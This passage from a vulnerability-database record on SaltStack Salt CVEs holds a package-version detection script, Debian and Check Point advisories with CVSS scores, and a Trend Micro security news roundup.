the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704676\");\n script_version(\"2020-05-07T03:00:32+0000\");\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-07 03:00:32 +0000 (Thu, 07 May 2020)\");\n script_name(\"Debian: Security Advisory for salt (DSA-4676-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4676.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4676-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'salt'\n package(s) announced via the DSA-4676-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\");\n\n 
script_tag(name:\"affected\", value:\"'salt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2016.11.2+ds-1+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-api\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-cloud\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-common\", 
ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-doc\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-master\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-minion\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-proxy\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-ssh\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"salt-syndic\", ver:\"2018.3.4+dfsg1-6+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:33", "description": "An authentication bypass vulnerability exists in Salt management framework. 
Successful exploitation of this vulnerability could allow a remote attacker to bypass login authentication and execute arbitrary commands on the affected system under the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "checkpoint_advisories", "title": "Saltstack Salt Authentication Bypass (CVE-2020-11651; CVE-2020-11652)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "CPAI-2020-0334", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-17T15:02:08", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. 
These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-30T04:21:15", "type": "debian", "title": "[SECURITY] [DLA 2223-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-30T04:21:15", "id": "DEBIAN:DLA-2223-1:998E3", "href": "https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-10-22T12:19:54", "description": "Package : salt\nVersion : 2014.1.13+ds-3+deb8u1\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\n\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\n The salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n\nCVE-2020-11652\n\n The salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-30T04:21:15", "type": "debian", "title": "[SECURITY] [DLA 2223-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-30T04:21:15", "id": "DEBIAN:DLA-2223-1:6A3F6", "href": "https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-29T22:26:54", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. 
For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T20:16:07", "type": "debian", "title": "[SECURITY] [DSA 4676-2] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", 
"CVE-2020-11652"], "modified": "2020-05-07T20:16:07", "id": "DEBIAN:DSA-4676-2:0B1C8", "href": "https://lists.debian.org/debian-security-announce/2020/msg00085.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T02:31:07", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-2 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 07, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2020-11651 CVE-2020-11652\nDebian Bug : 959684\n\nThe update for salt for the oldstable distribution (stretch) released as\nDSA 4676-1 contained an incomplete fix to address CVE-2020-11651 and\nCVE-2020-11652. Updated salt packages are now available to correct this\nissue. For reference, the original advisory text follows.\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u4.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T20:16:07", "type": "debian", "title": "[SECURITY] [DSA 4676-2] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-07T20:16:07", "id": "DEBIAN:DSA-4676-2:0B49A", "href": "https://lists.debian.org/debian-security-announce/2020/msg00085.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T02:31:59", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 
2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-06T04:15:33", "type": "debian", "title": "[SECURITY] [DSA 4676-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T04:15:33", "id": "DEBIAN:DSA-4676-1:2D12F", "href": "https://lists.debian.org/debian-security-announce/2020/msg00079.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-22T15:12:23", "description": "- 
-------------------------------------------------------------------------\nDebian Security Advisory DSA-4676-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 06, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : salt\nCVE ID : CVE-2019-17361 CVE-2020-11651 CVE-2020-11652\nDebian Bug : 949222 959684\n\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T04:15:33", "type": "debian", "title": "[SECURITY] [DSA 4676-1] salt security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T04:15:33", "id": "DEBIAN:DSA-4676-1:8BF11", "href": "https://lists.debian.org/debian-security-announce/2020/msg00079.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2020-05-29T15:51:50", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how, over the past five years, the cybercriminal underground has seen a major shift to new platforms, communications channels, products, and services. Also, read about a new wave of Sandworm cyberattacks against email servers conducted by one of Russia's most advanced cyber-espionage units.\n\nRead on:\n\n[**How the Cybercriminal Underground Has Changed in 5 Years**](<https://blog.trendmicro.com/how-the-cybercriminal-underground-has-changed-in-5-years/>)\n\n_Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, it has seen a major shift to new platforms, communications channels, products, and services, as trust on the dark web erodes and new market demands emerge. 
Trend Micro expects the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities._\n\n[**Shadowserver, an Internet Guardian, Finds a Lifeline**](<https://www.wired.com/story/shadowserver-funding-trend-micro-internet-society/>)\n\n_In March, internet security group Shadowserver_ _learned that longtime corporate sponsor Cisco was ending its support. With just weeks to raise hundreds of thousands of dollars to move its data center out of Cisco's facility\u2014not to mention an additional $1.7 million to make it through the year\u2014the organization was at real risk of extinction. Ten weeks later, Shadowserver has come a long way toward securing its financial future. This week, Trend Micro committed $600,000 to Shadowserver over three years, providing an important backbone to the organization's fundraising efforts. _\n\n[**#LetsTalkSecurity: No Trust for the Wicked**](<https://trendtalks.fyi/security/>)** **\n\n_This Week, Rik Ferguson, vice president of Security Research at Trend Micro, hosted the fourth episode of #LetsTalkSecurity featuring guest Dave Lewis, Global Advisory CISO at Duo Security. Check out this week\u2019s episode and follow the link to find information about upcoming episodes and guests._\n\n[**Principles of a Cloud Migration \u2013 Security W5H \u2013 The HOW**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-security-w5h-the-how/>)\n\n_Security needs to be treated much like DevOps in evolving organizations, meaning everyone in the company has a shared responsibility to make sure it is implemented. It is not just a part of operations, but a cultural shift in doing things right the first time \u2013 security by default. In this blog from Trend Micro, learn 3 tips to get you started on your journey to securing the cloud. 
_\n\n[**What\u2019s Trending on the Underground Market?**](<https://www.helpnetsecurity.com/2020/05/27/underground-market-trends/>)\n\n_Trust has eroded among criminal interactions in the underground markets, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, a new Trend Micro report reveals._ _Determined efforts by law enforcement appear to be having an impact on the cybercrime underground as several forums have been taken down by global police entities. _\n\n[**Is Cloud Computing Any Safer from Malicious Hackers?**](<https://blog.trendmicro.com/is-cloud-computing-any-safer-from-malicious-hackers/>)\n\n_Cloud computing has revolutionized the IT world, making it easier for companies to deploy infrastructure and applications and deliver their services to the public. The idea of not spending millions of dollars on equipment and facilities to host an on-premises data center is a very attractive prospect to many. But is cloud computing any safer from malicious threat actors? Read this blog from Trend Micro to find out. _\n\n[**Smart Yet Flawed: IoT Device Vulnerabilities Explained**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/smart-yet-flawed-iot-device-vulnerabilities-explained>)\n\n_The variety and range of functions of smart devices present countless ways of improving different industries and environments. While the \u201cthings\u201d in the internet of things (IoT) benefits homes, factories, and cities, these devices can also introduce blind spots and security risks in the form of vulnerabilities. Vulnerable smart devices open networks to attack vectors and can weaken the overall security of the internet. 
For now, it is better to be cautious and understand that \u201csmart\u201d can also mean vulnerable to threats._\n\n[**Cyberattacks Against Hospitals Must Stop, Says Red Cross**](<https://www.zdnet.com/article/cyberattacks-against-hospitals-must-stop-says-red-cross/>)\n\n_Immediate action needs to be taken to stop cyberattacks targeting hospitals and healthcare organizations during the ongoing coronavirus pandemic \u2013 and governments around the world need to work together to make it happen, says a newly published open letter signed by the International Committee of the Red Cross, former world leaders, cybersecurity executives and others._\n\n[**Securing the 4 Cs of Cloud-Native Systems: Cloud, Cluster, Container, and Code**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/securing-the-4-cs-of-cloud-native-systems-cloud-cluster-container-and-code>)\n\n_Cloud-native technologies enable businesses to make the most of their cloud resources with less overhead, faster response times, and easier management._ _Like any technology that uses various interconnected tools and platforms, security plays a vital role in cloud-native computing. Cloud-native security adopts the defense-in-depth approach and divides the security strategies utilized in cloud-native systems into four different layers._\n\n[**Coinminers Exploit SaltStack Vulnerabilities CVE-2020-11651 and CVE-2020-11652**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/coinminers-exploit-saltstack-vulnerabilities-cve-2020-11651-and-cve-2020-11652>)\n\n_Researchers from F-Secure recently disclosed two high-severity vulnerabilities in SaltStack Salt: CVE-2020-11651, an authentication bypass vulnerability, and CVE-2020-11652, a directory traversal vulnerability. These can be exploited by remote, unauthenticated attackers, and all versions of SaltStack Salt before 2019.2.4 and 3000 before 3000.2 are affected. 
Trend Micro has witnessed attacks exploiting these vulnerabilities, notably those using cryptocurrency miners._\n\n[**PonyFinal Ransomware Targets Enterprise Servers Then Bides Its Time**](<https://threatpost.com/ponyfinal-ransomware-enterprise-servers/156083/>)\n\n_A Java-based ransomware known as PonyFinal has emerged, targeting enterprise systems management servers as an initial infection vector. It exfiltrates information about infected environments, spreads laterally and then waits before striking \u2014 the operators go on to encrypt files at a later date and time, when the likelihood of the target paying is deemed to be the most likely._\n\n[**Qakbot Resurges, Spreads through VBS Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files>)\n\n_Trend Micro has seen events that point to the resurgence of Qakbot, a multi-component, information-stealing threat first discovered in 2007. Feedback from Trend Micro\u2019s sensors indicates that Qakbot detections increased overall. A notable rise in detections of a particular Qakbot sample (detected by Trend Micro as Backdoor.Win32.QBOT.SMTH) was also witnessed in early April. _\n\n[**CSO Insights: SBV\u2019s Ian Keller on the Challenges and Opportunities of Working Remotely**](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/cso-insights-sbv-s-ian-keller-on-the-challenges-and-opportunities-of-working-remotely>)\n\n_The COVID-19 pandemic has forced businesses to change the way they operate. These abrupt changes come with a unique set of challenges, including security challenges. 
Ian Keller, Chief Security Officer of SBV Services in South Africa, sat down with Trend Micro and shared his thoughts on how SBV is coping with the current pandemic, the main challenges they faced when transitioning their staff to remote work, as well as how they plan to move forward._\n\n[**NSA Warns of New Sandworm Attacks on Email Servers**](<https://www.zdnet.com/article/nsa-warns-of-new-sandworm-attacks-on-email-servers/>)\n\n_The US National Security Agency (NSA) has published a security alert warning of a new wave of cyberattacks against email servers, attacks conducted by one of Russia's most advanced cyber-espionage units. The NSA says that members of Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, have been attacking email servers running the Exim mail transfer agent (MTA)._\n\n[**Forward-Looking Security Analysis of Smart Factories <Part 2> Security Risks of Industrial Application Stores**](<https://www.trendmicro.com/us/iot-security/news/5859/Forward_looking_security_analysis_of_smart_factories_Part_2_Security_risks_of_industrial_application_stores>)\n\n_In the second part of this five series column, Trend Micro looks at the security risks to be aware of when promoting smart factories by examining overlooked attack vectors, feasible attack scenarios, and recommended defense strategies. This column is especially applicable for architects, engineers, and developers who are involved in smart factory technology. _\n\n[**Factory Security Problems from an IT Perspective (Part 2): People, Processes, and Technology**](<https://www.trendmicro.com/us/iot-security/news/5844/Factory_Security_Problems_from_an_IT_Perspective_Part_2_People_processes_and_technology>)\n\n_This blog is the second in a series that discusses the challenges that IT departments face when they are assigned the task of 